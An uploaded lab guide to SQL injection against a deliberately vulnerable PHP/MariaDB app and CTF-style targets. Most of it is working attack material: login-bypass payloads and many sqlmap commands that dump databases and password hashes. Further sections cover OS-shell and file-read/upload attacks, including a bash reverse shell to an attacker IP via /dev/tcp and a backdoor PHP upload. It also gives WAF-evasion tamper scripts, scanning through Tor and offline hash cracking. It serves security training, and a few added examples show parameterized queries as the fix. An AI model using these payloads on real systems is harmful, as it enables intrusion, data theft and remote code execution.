Automated and Manual SQL Injection

Uploaded by Jimmy Arturo

Deploy a vulnerable web services server

This lab is deliberately vulnerable: keep it on an isolated network (or behind a tunnel you control, as with the ngrok URLs below) and never expose it to the internet unattended.

Install apache2
sudo apt install apache2
sudo chown www-data:www-data /var/www/html/ -R

Install php
sudo apt install php libapache2-mod-php php-fpm
sudo apt install php-mysql php-bcmath php-curl php-imagick php-gd php-mbstring php-xml php-zip
sudo systemctl restart apache2

Install MariaDB
sudo apt install mariadb-server
sudo mysql -h localhost -u root -p
Inside the MariaDB client, create the database and the application account:
create database dbsistema character set utf8;
create user server@'localhost';
set password for 'server'@'localhost' = PASSWORD('juakers789');
grant all on dbsistema.* to 'server'@'localhost';
flush privileges;
Then leave the client and import the application's database dump (dbsistema.sql, not reproduced on this page) as the new account:
mysql -u server -p dbsistema < dbsistema.sql
The application stores passwords as unsalted SHA-256 hex digests in usuario.clave. To give user 1 a known password, compute the SHA-256 of that password (for example with https://emn178.github.io/online-tools/sha256.html) and write it into the row:
UPDATE usuario SET clave='8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918' WHERE idusuario=1;

Requirement
## Kali Linux: ##
1 - Firefox
2 - Burp Suite Community
## Plugins Firefox: ##
https://addons.mozilla.org/es/firefox/addon/foxyproxy-standard/
https://addons.mozilla.org/es/firefox/addon/hacktools/
https://addons.mozilla.org/es/firefox/addon/wappalyzer/
https://addons.mozilla.org/es/firefox/addon/http-header-live/
https://addons.mozilla.org/es/firefox/addon/retire-js/
SQL injection
Fuzzing SQLi Login Bypass:
Wordlist of authentication-bypass payloads, to be loaded into Burp Intruder against the login request:
https://raw.githubusercontent.com/payloadbox/sql-injection-payload-list/master/Intruder/exploit/Auth_Bypass.txt
Payload that bypasses the lab login (send it in both fields):
User: ' or 1=1 limit 1 -- -+
Pass: ' or 1=1 limit 1 -- -+
The quote closes the login string literal, or 1=1 makes the WHERE clause true for every row, limit 1 returns the first user (the administrator updated above) and -- turns the rest of the query, including the password check, into a comment. MySQL only treats -- as a comment when it is followed by whitespace, so the space after it matters; the trailing - keeps that space from being trimmed off the end of the input, and the + is the URL-encoded space.
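The bypass above shown end to end, as an added example (this is not code from the page or from the lab application): a string-built login query of the kind behind usuario.php?op=verificar next to the same query with bound parameters, run against an in-memory SQLite stand-in for the page's MariaDB. Assumptions, labelled in the code: SQLite instead of MariaDB, a constructed usuario table with one administrator, and that the application hashes the submitted password with unsalted SHA-256 before comparing it with clave.

```python
# Added example (not from the original page): the page's lab login is PHP +
# MariaDB; this stand-in uses Python's built-in sqlite3 in memory so it runs
# offline. Table/column names follow the page (usuario.login / usuario.clave,
# unsalted SHA-256 hex in clave); the single sample row is constructed.
import hashlib
import sqlite3

# The auth-bypass payload from the page (the trailing "+" on the page is the
# URL-encoded space after "-- -").
PAYLOAD = "' or 1=1 limit 1 -- -"


def sha256_hex(text: str) -> str:
    """Unsalted SHA-256 hex digest, the way the lab application stores clave."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one administrator whose password is 'admin'."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE usuario (idusuario INTEGER PRIMARY KEY, login TEXT, "
        "clave TEXT, cargo TEXT)"
    )
    conn.execute(
        "INSERT INTO usuario VALUES (1, 'admin', ?, 'Administrador')",
        (sha256_hex("admin"),),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, logina: str, clavea: str):
    """Builds the query by string concatenation (the pattern the page exploits).

    Returns the matched (idusuario, login, cargo) row, or None.
    """
    sql = (
        "SELECT idusuario, login, cargo FROM usuario "
        f"WHERE login='{logina}' AND clave='{sha256_hex(clavea)}'"
    )
    # With PAYLOAD as logina the statement that actually runs is
    #   ... WHERE login='' or 1=1 limit 1 -- -' AND clave='<hash>'
    # so the password check is commented out and the first row comes back.
    return conn.execute(sql).fetchone()


def login_hardened(conn: sqlite3.Connection, logina: str, clavea: str):
    """Same query with bound parameters: user input never becomes SQL syntax."""
    sql = "SELECT idusuario, login, cargo FROM usuario WHERE login=? AND clave=?"
    return conn.execute(sql, (logina, sha256_hex(clavea))).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, real creds :", login_vulnerable(db, "admin", "admin"))
    print("vulnerable, payload    :", login_vulnerable(db, PAYLOAD, "anything"))
    print("hardened,   real creds :", login_hardened(db, "admin", "admin"))
    print("hardened,   payload    :", login_hardened(db, PAYLOAD, "anything"))
```

The payload logs in as the administrator against the concatenated query with any password at all, and is simply a login name that matches nobody once it is passed as a bound parameter; that is the whole fix, independent of how the password is hashed.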

Perform a SQLi POST injection with sqlmap

Save the raw HTTP request of the vulnerable login from Burp Suite (right-click the request, Copy to file) and let sqlmap parse it; method, headers, cookies and body are all taken from the file:
sqlmap -r sql.txt --random-agent --dbs
The same test spelled out on the command line (sqlmap already infers POST from --data, so --method POST is redundant but harmless):
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --dbs
Identify the database the application is connected to.
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --current-db
List the DBMS users.
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --users
Dump the DBMS users' password hashes (read from the mysql system schema, so the application account must be allowed to read it).
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" --dbms=mysql --passwords
List the privileges of the DBMS users (here the application connects as the server account created above).
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" --privileges
List the tables of the dbsistema database.
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" -D dbsistema --tables
List the columns of the usuario table in the dbsistema database.
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" -D dbsistema -T usuario --columns

Dump the cargo, email, login and clave columns (role, e-mail, login and password hash) of the usuario table in the dbsistema database.
sqlmap -u 'https://d83c-38-43-159-183.sa.ngrok.io/sistema/ajax/usuario.php?op=verificar' --method POST --data="logina=sadsadasadsa&clavea=asdsada" -D dbsistema -T usuario -C cargo,email,login,clave --dump
sqlmap recognises the clave values as raw SHA-256 hashes (64 hex characters, no salt) and offers to crack them; the two hashes it found:
8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918
c5ff177a86e82441f93e3772da700d5f6838157fa1bfdc0bb689d7f7e55e7aba

Online hash lookup

These are SHA-256 hashes, not MD5, and a hash is not decrypted: sites such as CrackStation look it up in precomputed tables of common passwords, which only works because the application stores unsalted hashes. Do not paste hashes from a real engagement into third-party sites (it discloses client data); crack them offline instead, as in the next section.
link: https://crackstation.net/

Password Cracking Offline

John The Ripper
Put the two hashes in hash.txt, one per line, and run a wordlist attack with the raw-sha256 format (unsalted SHA-256):
john --format=raw-sha256 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=raw-sha256 --show hash.txt
The hashcat equivalent is mode 1400 (SHA2-256):
hashcat -m 1400 hash.txt /usr/share/wordlists/rockyou.txt
Password hash formats in John The Ripper:
https://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
https://raw.githubusercontent.com/Shiva108/CTF-notes/master/Notes%20VA/HashFormats_JackTheRipper.txt
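What the john command does, written out as an added example (not from the page or from John the Ripper): a dictionary attack on the two unsalted SHA-256 hashes dumped above, with a five-word constructed list in place of rockyou.txt so it runs offline. The first hash is the one written into usuario.clave for idusuario=1 during the lab setup and cracks to admin; the second is not in the toy list and stays uncracked, as it would until a real wordlist or rules are used.

```python
# Added example (not from the page): what `john --format=raw-sha256 --wordlist`
# does, against a small constructed wordlist instead of rockyou.txt so it runs
# offline. The two target hashes are the ones sqlmap dumped above.
import hashlib

TARGETS = [
    "8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918",
    "c5ff177a86e82441f93e3772da700d5f6838157fa1bfdc0bb689d7f7e55e7aba",
]

# Constructed stand-in for rockyou.txt (one candidate per line in a real list).
WORDLIST = ["123456", "password", "qwerty", "admin", "welcome1"]


def crack_raw_sha256(targets, wordlist):
    """Dictionary attack on unsalted SHA-256.

    Returns ({hash: plaintext} for the hashes that cracked, set of uncracked).
    Because nothing is salted, one digest per candidate is compared against
    every target at once; the cost does not grow with the number of hashes,
    which is exactly why unsalted fast hashes fall to wordlists in seconds.
    """
    pending = {h.lower() for h in targets}
    cracked = {}
    for candidate in wordlist:
        digest = hashlib.sha256(candidate.encode("utf-8")).hexdigest()
        if digest in pending:
            cracked[digest] = candidate
            pending.remove(digest)
            if not pending:
                break
    return cracked, pending


def load_wordlist(path):
    """Stream a real wordlist (e.g. /usr/share/wordlists/rockyou.txt) lazily;
    rockyou is latin-1, so undecodable bytes are skipped rather than fatal."""
    with open(path, "r", encoding="latin-1", errors="ignore") as fh:
        for line in fh:
            yield line.rstrip("\r\n")


if __name__ == "__main__":
    found, left = crack_raw_sha256(TARGETS, WORDLIST)
    for digest, password in found.items():
        print(f"{digest}:{password}")
    for digest in left:
        print(f"{digest}:<not in wordlist>")
```

The attack is cheap precisely because the application stores raw SHA-256: no salt, so one digest per candidate tests every stolen hash, and no work factor, so millions of candidates per second. Storing passwords with a salted, slow function (bcrypt, scrypt or Argon2) removes both shortcuts.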
Advanced SQLMAP
The following commands run against the XVWA SQLi exercise: search is the injectable POST parameter, -p limits testing to it and -v 3 prints every payload sent.
Identify the database directly affected by the SQLi exploitation.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --current-db
Identify the DBMS user the application connects as (this account's privileges decide what the rest of this section can do).
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --current-user
List the users in the database manager.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --users
List user privileges on the database manager.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --privileges
Obtain an interactive OS shell. This is not a reverse shell: sqlmap writes a web stager and a command-execution page into the web root through the injection (INTO DUMPFILE on MySQL), so the DBMS user needs the FILE privilege, secure_file_priv must allow writing there, the database process needs write access to that directory, and sqlmap must be given or must guess its absolute path.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --os-shell
Execute a single operating system command through the same mechanism; here a bash reverse shell to the attacker host 172.16.40.5 on port 443 (start a listener there first, for example nc -lvnp 443). The command is wrapped in double quotes so that the single-quoted bash -c argument survives the local shell.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --os-cmd "bash -c 'exec bash -i &>/dev/tcp/172.16.40.5/443 <&1'"
Read OS files. On MySQL this goes through LOAD_FILE(), so the DBMS user needs the FILE privilege, secure_file_priv must not restrict the path and the file must be readable by the database process.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --file-read='/etc/passwd'
sqlmap saves the retrieved file under its output directory, in a folder named after the target host (192.168.100.6 in this run):
cat /root/.local/share/sqlmap/output/192.168.100.6/files/_etc_passwd
Upload a file to the operating system vulnerable to SQLi (same write requirements as --os-shell): --file-write is the local file, --file-dest the absolute path it is written to on the target.
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' -v 3 --file-write='/root/backdor.php' --file-dest='/var/www/html/xvwa/config1.php'
Injection with prefix identification. The col parameter ends up as a column name inside backticks (for example ORDER BY `id`), so --prefix='`' closes the identifier before each payload; --no-cast turns off the casting sqlmap normally wraps around retrieved values, which some targets reject, and --code=200 uses the HTTP status code to tell TRUE from FALSE responses.
sqlmap -u 'http://104.248.172.152:32587/case6.php?col=id' --dbms="mysql" --level=3 --risk=2 --code=200 --prefix='`' --no-cast
sqlmap -u 'http://104.248.172.152:32587/case6.php?col=id' --dbms="mysql" --level=3 --risk=2 --code=200 --prefix='`' --no-cast --time-sec=2 -D testdb -T flag6 -C Content --dump
Injection with union identification. --technique=U restricts sqlmap to UNION-based tests, --union-cols=1-20 sets the range of column counts it tries and --union-char='1' the filler value for the unused columns (some targets reject the default NULL).
sqlmap -u 'http://167.172.52.160:32714/case7.php?id=1' --level=3 --risk=3 --no-cast --union-char='1' --dbms="mysql" --random-agent --technique=U --union-cols=1-20
sqlmap -u 'http://167.172.52.160:32714/case7.php?id=1' --level=3 --risk=3 --no-cast --union-char='1' --dbms="mysql" --random-agent --technique=U --union-cols=1-20 -D testdb -T flag7 -C Content --dump
Anti-CSRF Token Bypass Injection
The form carries a single-use anti-CSRF token. --csrf-token names that parameter and sqlmap fetches a fresh value before every request (from the target URL itself unless --csrf-url points elsewhere); the cookie of the session that issued the token must be sent along or the token will not match.
sqlmap -u 'http://167.172.52.160:31918/case8.php' --data="id=1&t0ken=uwDFtZygjfiRWmWzY0tc4IQV3a4P1q6G97E0xXS8uw" --csrf-token="t0ken" --random-agent --skip-waf
sqlmap -u 'http://167.172.52.160:31918/case8.php' --data="id=1&t0ken=uwDFtZygjfiRWmWzY0tc4IQV3a4P1q6G97E0xXS8uw" --csrf-token="t0ken" --cookie="PHPSESSID=enos23dmkupup8hhfghm2hpgso" --random-agent -D testdb -T flag8 -C Content --dump
Single Value Bypass Injection
The uid parameter must be unique on every request (an anti-replay value). --randomize=uid makes sqlmap generate a fresh random value of the same length and type each time; piping -v 5 output through grep URI shows the exact URLs sent so the randomisation can be checked before testing.
sqlmap -u 'http://167.172.52.160:31918/case9.php?id=1&uid=1599283944' --randomize=uid --batch -v 5 | grep URI
sqlmap -u 'http://167.172.52.160:31918/case9.php?id=1&uid=1599283944' --randomize=uid --batch -v 5 --random-agent --dbs
Injection Bypass Filtering of characters '<', '>'
The between tamper rewrites comparisons so that no angle bracket (or equals sign) is sent: A > B becomes A NOT BETWEEN 0 AND B and A = B becomes A BETWEEN B AND B.
sqlmap -u '167.172.52.160:31918/case11.php?id=1' --tamper=between --level=3 --risk=3 --no-cast --dbms=mysql --dbs

Injection in a JSON body. The request was copied from Firefox as cURL with the leading curl replaced by sqlmap, headers included; --data-raw carries the JSON body and sqlmap injects into the "id" value. With a time-based blind technique, --time-sec=2 shortens the delay sqlmap asks the database for, which speeds up the dump on a fast link at the cost of more false positives on a slow one.
sqlmap 'http://178.128.42.126:30292/action.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/json' -H 'Origin: http://178.128.42.126:30292' -H 'Connection: keep-alive' -H 'Referer: http://178.128.42.126:30292/shop.html' -H 'Cookie: sort=0a' --data-raw '{"id":1}' --dbms="mysql" --level=3 --risk=2 --no-cast --tamper=between --time-sec=2 -D production -T final_flag -C content --dump

WAF Evasion
List the bundled tamper scripts; each one rewrites every payload before it is sent, and several can be chained with commas:
ls /usr/share/sqlmap/tamper
sqlmap -u 'http://127.0.0.1/xvwa/vulnerabilities/sqli/' --data='item=&search=7' -p 'search' --random-agent --timeout=3 --threads=10 --dbms=mysql --level=5 --risk=3 -v 3 --no-cast --dbs --tamper='htmlencode'
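For the two filtered targets above (the '<' '>' filter handled with --tamper=between and the WAF-evasion run with --tamper='htmlencode'), here is how a tamper script is built, as an added example that is not sqlmap's own between.py: a custom script in the shape sqlmap loads with --tamper=/path/to/script.py, which rewrites >, < and = into BETWEEN forms and verifies on an in-memory SQLite (standing in for the target DBMS) that the rewritten predicate keeps its truth value. The file name, the operand regular expression and the SQLite check are this example's assumptions; the tamper(payload, **kwargs) signature and the __priority__ attribute are sqlmap's loading contract.

```python
# Added example, not from the page and not sqlmap's bundled between.py: a custom
# tamper script in the shape sqlmap loads with --tamper=/path/to/nobrackets.py
# (the file name is hypothetical). It rewrites the comparison operators that
# the filtered endpoints above reject into BETWEEN forms, the same idea as the
# bundled 'between' tamper, and checks on an in-memory SQLite that the
# rewritten predicate evaluates to the same value as the original.
import re
import sqlite3

try:
    # Inside sqlmap's tree the priority enum is importable; stand-alone it is
    # not, so fall back to a plain integer (lowest priority) for the demo.
    from lib.core.enums import PRIORITY
    __priority__ = PRIORITY.NORMAL
except ImportError:
    __priority__ = 0

# An operand here is a bare word/number, a quoted string, or a function call
# with at most one level of nested parentheses, e.g. ASCII(SUBSTR(a,1,1)).
# Operands containing spaces are deliberately not handled (assumption).
_OPERAND = r"((?:'[^']*'|[\w.]+(?:\([^()]*(?:\([^()]*\))*[^()]*\))?))"
_GT = re.compile(_OPERAND + r"\s*>\s*" + _OPERAND)
_LT = re.compile(_OPERAND + r"\s*<\s*" + _OPERAND)
_EQ = re.compile(_OPERAND + r"\s*=\s*" + _OPERAND)


def tamper(payload, **kwargs):
    """sqlmap calls tamper(payload) for every payload and sends what it returns.

    A > B  ->  A NOT BETWEEN 0 AND B   (same truth value while A >= 0)
    A < B  ->  B NOT BETWEEN 0 AND A   (same truth value while B >= 0)
    A = B  ->  A BETWEEN B AND B
    Blind-injection probes compare ASCII()/LENGTH() results, which are never
    negative, so the rewrite preserves what the probe measures. >=, <=, <>
    and != are left untouched because no operand matches on their far side.
    """
    if not payload:
        return payload
    payload = _GT.sub(r"\1 NOT BETWEEN 0 AND \2", payload)
    payload = _LT.sub(r"\2 NOT BETWEEN 0 AND \1", payload)
    payload = _EQ.sub(r"\1 BETWEEN \2 AND \2", payload)
    return payload


def evaluate(predicate: str):
    """Evaluate a boolean SQL predicate on SQLite (stand-in for the target)."""
    conn = sqlite3.connect(":memory:")
    try:
        return conn.execute(f"SELECT ({predicate})").fetchone()[0]
    finally:
        conn.close()


def same_truth_value(predicate: str) -> bool:
    """True when the tampered predicate evaluates exactly like the original."""
    return evaluate(predicate) == evaluate(tamper(predicate))


if __name__ == "__main__":
    for probe in ("1 AND LENGTH('admin') > 4", "1 AND ASCII('a') = 97", "3 < 5"):
        print(f"{probe!r:35} -> {tamper(probe)!r}  equivalent={same_truth_value(probe)}")
```

Drop the file anywhere and pass its path to --tamper; sqlmap prints the rewritten payloads at -v 3. The rewrite is only exact when the left side of > (right side of <) is non-negative, which holds for the ASCII() and LENGTH() probes blind injection relies on; a payload comparing arbitrary signed values would need a different encoding.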

Search by columns
--search with -C looks for columns whose name contains the given string (nombre here; sqlmap asks whether to treat it as a LIKE pattern or an exact name) across every database the account can see, and --hex retrieves values hex-encoded, which avoids trouble with non-printable or non-ASCII data.
sqlmap -u 'https://www.tuwebsito.com/?search=aea' --random-agent --timeout=3 --threads=10 --dbms=mysql --level=5 --risk=3 -v 3 --hex -C nombre --search

Extract data from columns by number of records

On Oracle, against a large table, dump a slice of rows instead of everything: --pivot-column names a column with unique values that sqlmap walks to address individual rows, and --start/--stop select rows 1 to 10. --string="KM" is the text present only in TRUE responses (boolean-based detection), and the two tampers are chained with a comma.
sqlmap -u 'https://www.tuwebsito.com/?search=aea' --level=2 --risk=1 --no-cast -p 'continente' --string="KM" --dbms="Oracle" --time-sec=1 --tamper="between,charencode" --random-agent -D IDODB -T ACT_VERIFICACION --pivot-column=PRE_NOMBRES -C PRE_NOMBRES_E --start=1 --stop=10 --dump

Identify parameters through crawling

--crawl=N follows links from the start URL down to depth N and tests every parameter it finds; --forms also parses and fills HTML forms; --answers pre-answers sqlmap's prompts (the key is a substring of the prompt, several pairs are separated by commas, and a repeated --answers only keeps the last one) so that --batch runs are not stalled.
sqlmap -u http://testphp.vulnweb.com/ --crawl=10 --level=1 --risk=1 --answers="do you want to test this URL=Y,Do you want to skip further tests involving it?=N" --threads 10 --batch
sqlmap -u http://testphp.vulnweb.com/ --forms --batch --crawl=10 --level=2 --risk=1 --cookie="PHPSESSID=enos23dmkupup8hhfghm2hpgso" --random-agent
sqlmap -u http://testphp.vulnweb.com/ --forms --batch --crawl=10 --level=2 --risk=1 --dbms=mysql --answers "already=N"
sqlmap -u http://testphp.vulnweb.com/ --forms --batch --crawl=10 --level=2 --risk=1 --dbms=mysql --answers="follow=Y"
Identify parameters of multiple endpoints (urls)

-m takes a file with one target URL per line and tests each in turn; the second form applies the same POST body and session cookie to every URL in the list.
sqlmap -m urls.txt --batch --level=3 --risk=2 --dbms=mysql --answers "already=N"
sqlmap -m sql.txt --batch --level=3 --risk=2 --dbms=mysql --answers "already=N" --method POST --data="id=1" --cookie="PHPSESSID=msk54snle4a8dfca774mhrih13" --dbs

Pentesting an onion target (SQLi through Tor)

sudo apt install tor proxychains4
sudo systemctl start tor
Check which SOCKS port Tor listens on and use that port everywhere below: the apt-installed daemon defaults to 127.0.0.1:9050, while 9150 is the Tor Browser bundle's port.
netstat -apn | grep tor
ss -lntp | grep tor
Port scan through the proxy: TCP connect scans only (-sT), no ping (-Pn) and no local DNS (-n), so every packet, including the .onion resolution, goes through Tor.
proxychains4 nmap -sT -Pn -n -p- 2uw3iwonlklvl5bftdqwebg7n4v62yq3nrpbczry2flmpghpajc45xqd.onion
Run sqlmap over Tor from a saved request (web.txt); --check-tor verifies that traffic really leaves through Tor before any test is sent, and --tor-port must match the port found above.
sqlmap -r web.txt --dbms='mysql' --random-agent --tor --check-tor --tor-port=9150 --tor-type=SOCKS5 --level 2 --risk 2 --dbs

SQL Manual
Manual UNION-based injection into a numeric parameter. post=-1 makes the original query return no rows, so the row produced by the injected UNION SELECT is what the page renders; the injected SELECT must have exactly as many columns as the original query (ten here). All of the payloads use MySQL syntax (VERSION(), DATABASE(), information_schema, LIMIT offset,count and the # comment).

Find the column count: keep adding columns until the page stops erroring. Ten columns succeed here, and the numbers that appear in the rendered page show which columns are displayed; the payloads below put their expressions in the third (and fourth) column for that reason.
http://192.168.30.122:5432/post.php?post=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+--

Retrieve the version of the database and the name of the current database.
http://192.168.30.122:5432/post.php?post=-1+UNION+SELECT+1,2,VERSION(),DATABASE(),5,6,7,8,9,10+--

Retrieve the DBMS user the application connects as.
http://192.168.30.122:5432/post.php?post=-1+UNION+SELECT+1,2,current_user(),4,5,6,7,8,9,10+--

Enumerate the tables of the current database through information_schema.tables one at a time: LIMIT 0,1 returns the first table name, LIMIT 3,1 the fourth.
http://192.168.30.122:5432/post.php?post=-1+UNION+SELECT+1,2,table_name,4,5,6,7,8,9,10%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1
http://192.168.30.122:5432/post.php?post=-1+UNION+SELECT+1,2,table_name,4,5,6,7,8,9,10%20from%20information_schema.tables%20where%20table_schema=database()%20limit%203,1

Retrieve all table names of the current database in a single response with group_concat.
http://192.168.30.122:5432/post.php?post=-1+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8,9,10%20from%20information_schema.tables%20where%20table_schema=database()

Retrieve all column names of the table named "users" (%27 is the URL-encoded single quote).
http://192.168.30.122:5432/post.php?post=-1+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8,9,10%20from%20information_schema.columns%20where%20table_name=%27users%27

Retrieve the privileges of the DBMS user from information_schema.user_privileges (grantee, privilege type and whether it is grantable, joined with --); the trailing # comments out whatever follows the parameter in the original query.
http://192.168.30.122:5432/post.php?post=-1+UNION+ALL+SELECT+1,2,concat(grantee,%27--%27,%20privilege_type,%27--%27,%20is_grantable),4,5,6,7,8,9,10%20FROM%20information_schema.user_privileges#
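The manual UNION sequence above carried out end to end, as an added example that is not from the page: the column-count probe, the version, table names one at a time and with group_concat, the definition of the users table and finally a dump. The target is an in-memory SQLite database standing in for post.php and its MySQL backend (assumptions: sqlite_version() for VERSION(), sqlite_master for information_schema, three columns instead of ten); the posts and users tables and their rows are constructed sample data.

```python
# Added example, not from the page. The page's target is MySQL (VERSION(),
# DATABASE(), information_schema, LIMIT offset,count); here an in-memory SQLite
# database plays the part of post.php so the steps run offline: sqlite_version()
# stands in for VERSION(), sqlite_master for information_schema.tables, and the
# original query has three columns instead of the page's ten. The posts and
# users tables and their rows are constructed sample data.
import sqlite3


def make_app() -> sqlite3.Connection:
    """Constructed backend: one public table and one the attacker wants."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE posts (id INTEGER, title TEXT, body TEXT);"
        "CREATE TABLE users (id INTEGER, username TEXT, password TEXT);"
        "INSERT INTO posts VALUES (1, 'Hello', 'First post');"
        "INSERT INTO users VALUES (1, 'admin', 's3cret');"
        "INSERT INTO users VALUES (2, 'bob', 'hunter2');"
    )
    return conn


def post_php(conn: sqlite3.Connection, post: str):
    """The vulnerable endpoint: the post parameter is concatenated into the
    query exactly as post.php?post=... does above, and every row is rendered."""
    return conn.execute(f"SELECT id, title, body FROM posts WHERE id={post}").fetchall()


def find_column_count(conn: sqlite3.Connection, max_cols: int = 10) -> int:
    """Step 1: add NULL columns to the UNION until the DBMS stops complaining."""
    for n in range(1, max_cols + 1):
        try:
            post_php(conn, "-1 UNION SELECT " + ",".join(["NULL"] * n) + " -- ")
            return n
        except sqlite3.OperationalError:
            # "SELECTs to the left and right of UNION do not have the same
            # number of result columns": try one more column.
            continue
    raise RuntimeError(f"no UNION with up to {max_cols} columns succeeded")


def union_extract(conn, expr: str, ncols: int, slot: int = 1, tail: str = "") -> str:
    """Put expr in one rendered column of the UNION row (slot, 0-based; the
    page uses its third column the same way) and read it back. tail carries
    an optional FROM/WHERE/LIMIT clause that must follow the column list."""
    cols = ["NULL"] * ncols
    cols[slot] = expr
    payload = "-1 UNION SELECT " + ",".join(cols) + (" " + tail if tail else "") + " -- "
    rows = post_php(conn, payload)
    return rows[0][slot]


def enumerate_target(conn: sqlite3.Connection) -> dict:
    """The page's manual sequence, end to end, against the stand-in."""
    n = find_column_count(conn)
    tables = "FROM sqlite_master WHERE type='table'"
    return {
        "columns": n,
        "version": union_extract(conn, "sqlite_version()", n),
        # one table per request, as with LIMIT 0,1 / LIMIT 3,1 on the page
        "first_table": union_extract(conn, "name", n, tail=tables + " LIMIT 0,1"),
        "second_table": union_extract(conn, "name", n, tail=tables + " LIMIT 1,1"),
        # all of them at once, as with group_concat(table_name)
        "all_tables": union_extract(conn, "group_concat(name)", n, tail=tables),
        # column names: SQLite keeps the CREATE statement instead of
        # information_schema.columns
        "users_schema": union_extract(conn, "sql", n, tail="FROM sqlite_master WHERE name='users'"),
        "users_dump": union_extract(conn, "group_concat(username||':'||password)", n, tail="FROM users"),
    }


if __name__ == "__main__":
    for key, value in enumerate_target(make_app()).items():
        print(f"{key:13}: {value}")
```

On the real MySQL target the same calls work with the page's expressions (VERSION(), DATABASE(), table_name with the tail from information_schema.tables where table_schema=database()); only the stand-in strings change, and the column count comes from the probe instead of being assumed.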
Vulnerable Web Applications:
https://github.com/infosecAK/defenselessV1
https://github.com/s4n7h0/xvwa
https://github.com/anil-yelken/Vulnerable-Soap-Service
https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application
https://github.com/appsecco/dvna
https://github.com/snoopysecurity/dvws-node
https://github.com/appsecco/dvja
https://github.com/WebGoat/WebGoat
https://github.com/juice-shop/juice-shop
https://github.com/appelsiini/vulnerable-laravel-app
https://github.com/appsecco/dvcsharp-api
https://github.com/srini0x00/dvta
https://github.com/OWASP/DVSA
https://github.com/cider-security-research/cicd-goat
https://github.com/tinchoabbate/damn-vulnerable-defi/tree/v3.0.0
https://github.com/ine-labs/AzureGoat
https://github.com/ine-labs/AWSGoat
